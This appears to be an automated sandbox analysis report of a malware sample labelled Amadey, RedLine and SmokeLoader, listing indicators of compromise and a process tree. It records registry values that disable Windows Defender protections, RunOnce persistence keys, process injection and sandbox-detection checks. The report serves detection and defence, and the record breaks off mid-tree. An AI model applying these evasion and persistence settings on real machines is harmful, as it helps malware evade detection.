amadey | beecfa67960928cbd5b0b6520982d13289f4ea2d703773d21aba01fe015703f6

Windows Service

T1543.003

Disable or Modify Tools

T1562.001

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	FB57.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	FB57.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	FB57.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	AppLaunch.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	AppLaunch.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	FB57.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	FB57.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	FB57.exe

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 1 IoCs

resource	yara_rule
behavioral2/memory/4064-49-0x0000000000400000-0x000000000043E000-memory.dmp	family_redline

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Downloads MZ/PE file

Checks computer location settings 2 TTPs 4 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	5QT1FS0.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	F46F.bat
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	FF7E.exe
Key value queried	\REGISTRY\USER\S-1-5-21-2344688013-2965468717-2034126-1000\Control Panel\International\Geo\Nation	explothe.exe

Executes dropped EXE 21 IoCs

pid	Process
2564	FY9lG76.exe
4388	nu3AW97.exe
744	xg7Xw74.exe
1828	1MO50GX2.exe
1064	2Qg9573.exe
2936	3jO01Ks.exe
3024	4Oo807Un.exe
3796	5QT1FS0.exe
1652	E848.exe
2824	kj1Sn7Eh.exe
4888	F299.exe
5068	lR3zZ2Jw.exe
4212	gQ8wE3JA.exe
3748	F46F.bat
2212	cx1ZL0LQ.exe
4944	1rH83xp7.exe
4880	F7FA.exe
3324	FB57.exe
3188	FF7E.exe
4752	explothe.exe
232	explothe.exe

Windows security modification 2 TTPs 1 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0"	FB57.exe

Adds Run key to start application 2 TTPs 9 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	FY9lG76.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	E848.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\""	gQ8wE3JA.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\""	cx1ZL0LQ.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	file.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	nu3AW97.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	xg7Xw74.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	kj1Sn7Eh.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	lR3zZ2Jw.exe

Suspicious use of SetThreadContext 7 IoCs

description	pid	Process	procid_target
PID 1828 set thread context of 3164	1828	1MO50GX2.exe	91
PID 1064 set thread context of 4132	1064	2Qg9573.exe	101
PID 2936 set thread context of 1316	2936	3jO01Ks.exe	109
PID 3024 set thread context of 4064	3024	4Oo807Un.exe	116
PID 4888 set thread context of 4636	4888	F299.exe	165
PID 4944 set thread context of 5144	4944	1rH83xp7.exe	170
PID 4880 set thread context of 5348	4880	F7FA.exe	178

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 9 IoCs

pid	pid_target	Process	procid_target
364	1828	WerFault.exe	89
5052	1064	WerFault.exe	98
2324	4132	WerFault.exe	101
1716	2936	WerFault.exe	107
1584	3024	WerFault.exe	114
3040	4888	WerFault.exe	144
5256	4944	WerFault.exe	148
5296	5144	WerFault.exe	170
5940	4880	WerFault.exe	150

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	AppLaunch.exe

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

pid	Process
3904	schtasks.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3164	AppLaunch.exe
3164	AppLaunch.exe
1316	AppLaunch.exe
1316	AppLaunch.exe
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found
3248	Process not Found

Suspicious behavior: MapViewOfSection 1 IoCs

pid	Process
1316	AppLaunch.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 11 IoCs

pid	Process
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe

Suspicious use of AdjustPrivilegeToken 58 IoCs

description	pid	Process
Token: SeDebugPrivilege	3164	AppLaunch.exe
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeDebugPrivilege	3324	FB57.exe
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found
Token: SeShutdownPrivilege	3248	Process not Found
Token: SeCreatePagefilePrivilege	3248	Process not Found

Suspicious use of FindShellTrayWindow 33 IoCs

pid	Process
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe

Suspicious use of SendNotifyMessage 32 IoCs

pid	Process
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe
1364	msedge.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
3248	Process not Found

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 312 wrote to memory of 2564	312	file.exe	86
PID 312 wrote to memory of 2564	312	file.exe	86
PID 312 wrote to memory of 2564	312	file.exe	86
PID 2564 wrote to memory of 4388	2564	FY9lG76.exe	87
PID 2564 wrote to memory of 4388	2564	FY9lG76.exe	87
PID 2564 wrote to memory of 4388	2564	FY9lG76.exe	87
PID 4388 wrote to memory of 744	4388	nu3AW97.exe	88
PID 4388 wrote to memory of 744	4388	nu3AW97.exe	88
PID 4388 wrote to memory of 744	4388	nu3AW97.exe	88
PID 744 wrote to memory of 1828	744	xg7Xw74.exe	89
PID 744 wrote to memory of 1828	744	xg7Xw74.exe	89
PID 744 wrote to memory of 1828	744	xg7Xw74.exe	89
PID 1828 wrote to memory of 3164	1828	1MO50GX2.exe	91
PID 1828 wrote to memory of 3164	1828	1MO50GX2.exe	91
PID 1828 wrote to memory of 3164	1828	1MO50GX2.exe	91
PID 1828 wrote to memory of 3164	1828	1MO50GX2.exe	91
PID 1828 wrote to memory of 3164	1828	1MO50GX2.exe	91
PID 1828 wrote to memory of 3164	1828	1MO50GX2.exe	91
PID 1828 wrote to memory of 3164	1828	1MO50GX2.exe	91
PID 1828 wrote to memory of 3164	1828	1MO50GX2.exe	91
PID 744 wrote to memory of 1064	744	xg7Xw74.exe	98
PID 744 wrote to memory of 1064	744	xg7Xw74.exe	98
PID 744 wrote to memory of 1064	744	xg7Xw74.exe	98
PID 1064 wrote to memory of 4132	1064	2Qg9573.exe	101
PID 1064 wrote to memory of 4132	1064	2Qg9573.exe	101
PID 1064 wrote to memory of 4132	1064	2Qg9573.exe	101
PID 1064 wrote to memory of 4132	1064	2Qg9573.exe	101
PID 1064 wrote to memory of 4132	1064	2Qg9573.exe	101
PID 1064 wrote to memory of 4132	1064	2Qg9573.exe	101
PID 1064 wrote to memory of 4132	1064	2Qg9573.exe	101
PID 1064 wrote to memory of 4132	1064	2Qg9573.exe	101
PID 1064 wrote to memory of 4132	1064	2Qg9573.exe	101
PID 1064 wrote to memory of 4132	1064	2Qg9573.exe	101
PID 4388 wrote to memory of 2936	4388	nu3AW97.exe	107
PID 4388 wrote to memory of 2936	4388	nu3AW97.exe	107
PID 4388 wrote to memory of 2936	4388	nu3AW97.exe	107
PID 2936 wrote to memory of 1316	2936	3jO01Ks.exe	109
PID 2936 wrote to memory of 1316	2936	3jO01Ks.exe	109
PID 2936 wrote to memory of 1316	2936	3jO01Ks.exe	109
PID 2936 wrote to memory of 1316	2936	3jO01Ks.exe	109
PID 2936 wrote to memory of 1316	2936	3jO01Ks.exe	109
PID 2936 wrote to memory of 1316	2936	3jO01Ks.exe	109
PID 2564 wrote to memory of 3024	2564	FY9lG76.exe	114
PID 2564 wrote to memory of 3024	2564	FY9lG76.exe	114
PID 2564 wrote to memory of 3024	2564	FY9lG76.exe	114
PID 3024 wrote to memory of 4064	3024	4Oo807Un.exe	116
PID 3024 wrote to memory of 4064	3024	4Oo807Un.exe	116
PID 3024 wrote to memory of 4064	3024	4Oo807Un.exe	116
PID 3024 wrote to memory of 4064	3024	4Oo807Un.exe	116
PID 3024 wrote to memory of 4064	3024	4Oo807Un.exe	116
PID 3024 wrote to memory of 4064	3024	4Oo807Un.exe	116
PID 3024 wrote to memory of 4064	3024	4Oo807Un.exe	116
PID 3024 wrote to memory of 4064	3024	4Oo807Un.exe	116
PID 312 wrote to memory of 3796	312	file.exe	119
PID 312 wrote to memory of 3796	312	file.exe	119
PID 312 wrote to memory of 3796	312	file.exe	119
PID 3796 wrote to memory of 3368	3796	5QT1FS0.exe	120
PID 3796 wrote to memory of 3368	3796	5QT1FS0.exe	120
PID 3368 wrote to memory of 1364	3368	cmd.exe	123
PID 3368 wrote to memory of 1364	3368	cmd.exe	123
PID 3368 wrote to memory of 4344	3368	cmd.exe	124
PID 3368 wrote to memory of 4344	3368	cmd.exe	124
PID 1364 wrote to memory of 5096	1364	msedge.exe	125
PID 1364 wrote to memory of 5096	1364	msedge.exe	125

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Users\Admin\AppData\Local\Temp\file.exe
"C:\Users\Admin\AppData\Local\Temp\file.exe"
1⤵
- DcRat
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:312
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\FY9lG76.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\FY9lG76.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2564
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nu3AW97.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\nu3AW97.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:4388
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xg7Xw74.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\xg7Xw74.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:744
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1MO50GX2.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1MO50GX2.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1828
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        Modifies Windows Defender Real-time Protection settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3164
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 592
        6⤵
        Program crash
        
        PID:364
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Qg9573.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Qg9573.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:1064
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        
        PID:4132
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4132 -s 540
        7⤵
        Program crash
        
        PID:2324
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1064 -s 136
        6⤵
        Program crash
        
        PID:5052
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3jO01Ks.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3jO01Ks.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:2936
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:1316
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2936 -s 592
        5⤵
        Program crash
        
        PID:1716
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Oo807Un.exe
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Oo807Un.exe
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - Suspicious use of WriteProcessMemory
    PID:3024
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      PID:4064
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 3024 -s 136
      4⤵
      Program crash
      PID:1584
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5QT1FS0.exe
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5QT1FS0.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3796
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\63B6.tmp\63B7.tmp\63B8.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5QT1FS0.exe"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3368
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      Enumerates system info in registry
      Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
      Suspicious use of FindShellTrayWindow
      Suspicious use of SendNotifyMessage
      Suspicious use of WriteProcessMemory
      PID:1364
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffa2f2946f8,0x7ffa2f294708,0x7ffa2f294718
        5⤵
        
        PID:5096
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2136 /prefetch:3
        5⤵
        
        PID:2244
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2084 /prefetch:2
        5⤵
        
        PID:2660
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2132 /prefetch:8
        5⤵
        
        PID:2568
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3288 /prefetch:1
        5⤵
        
        PID:4712
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3296 /prefetch:1
        5⤵
        
        PID:2200
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2768 /prefetch:1
        5⤵
        
        PID:3232
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
        5⤵
        
        PID:3056
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
        5⤵
        
        PID:4244
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2068,12319093603726576536,13246716223548935763,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1792 /prefetch:1
        5⤵
        
        PID:5084
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
